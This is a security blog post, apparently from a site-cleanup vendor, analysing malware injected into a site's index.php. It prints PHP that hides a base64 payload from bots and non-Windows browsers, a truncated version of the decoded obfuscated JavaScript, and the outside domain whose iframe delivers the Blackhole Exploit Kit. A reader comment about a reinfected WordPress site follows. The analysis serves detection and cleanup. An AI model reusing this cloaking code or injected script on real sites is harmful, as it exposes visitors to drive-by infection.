A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.
After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.
Once we got access to the site, we learned why. It had the following code on the index.php file:
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER[‘HTTP_USER_AGENT’];
$botsUA = array(‘12345′,’alexa.com’,’anonymouse.org’,’bdbrandprotect.com’,
‘blogpulse.com’,’bot’,’buzztracker.com’,’crawl’,’docomo’,’drupal.org’,
‘httpclient’,’internetseer.com’,’linux’,’macintosh’,’mac os’,’magent’,’mailru’,
‘netcraft’,’openacoon.de’,’opera mini’,’opera mobi’,’playstation’,
‘rssreader’,’slurp’,’snoopy’,’spider’,’spyder’
,’validator’,’virus’,’vlc media player’,’webcollage’,’wordpress’,’x11′,
‘iphone’,’android’, ‘firefox’);
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
echo(base64_decode("PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0icmYzIi5zcGx…
Do you know what it does? It checks the user agent (aka browser) of the person visiting the site and only displays the malware if it does not contain the strings “Linux”, “Mac”, “Iphone”, “Firefox”, “Bot”, “Virus”, etc…
So if you are on a Mac, or Linux, or using Firefox, nothing would happen. However, when you go to the site using Windows and IE or Chrome, it would attempt to compromise your browser/computer.
This makes much harder for the owner of the site to detect the malware and take action to remove it. That’s why on our malware scanner, we use multiple Browsers, referrers, and user agents to try to catch any hidden malicious code. So just because you can’t see it, doesn’t mean it is not there 🙂
Technical details
If you are curious about what that code above does after being decoded, it prints the following JavaScript to the bottom of the site:
<script>if(window.document)a="rf3".split("5236").pop+’qwe’;a=a[“spli”+”t”](“”).reverse()[“po”+”p”]();if(a==’f’||a==”n”)
f=[5,5,101,98,28,36,96,107,95,113,105,97,106,112,42,99,97,112,65,104,97,105,97,
106,112,111,62,117,80,93,99,74,93,105,97,36,35,94,107,96,117,35,37,87,44,89,37,
119,5,5,5,101,98,110..
When this script read by the browser, it will create an iFrame to http://vvesek.freetcp.com/i/i.php?go=1 (and variations – these domains change often), where the actual Blackhole Exploit Kit code will come from.
Conclusion
This is just an example why sometimes users complain of malware when visiting a site, but the owner doesn’t see it. This may also lead to Sucuri scanner alerts and the owner can’t find the issue. If you have any questions, let us know.
Is your site hacked? Blacklisted? We are here to help.
Antony Garand
Luke Leal
Victor Santoyo
Marc Kranat
Cesar Anjos
John Castro
Ben Martin
Tony Perez
Estevao Avillez
1 comment
I found malware with your scaner (previously I sawe some strange codes on pingdom tools
Test the Load Time of a Web Page. I came to the caner and found some iframe. Next i found this iframe code on my footer.php I clean it and scaner showed no malware but pingdom tools showed again this code but this time just once. next day today i scaned again and again same iframe. So I went and I see in footer same code on same place:(. So I researched another .php and there are many with this code as f.e. wp-login, wp-app and many more…
I changed all passwords but nothing helps. Any ideas how can i clean this s..t?
Comments are closed.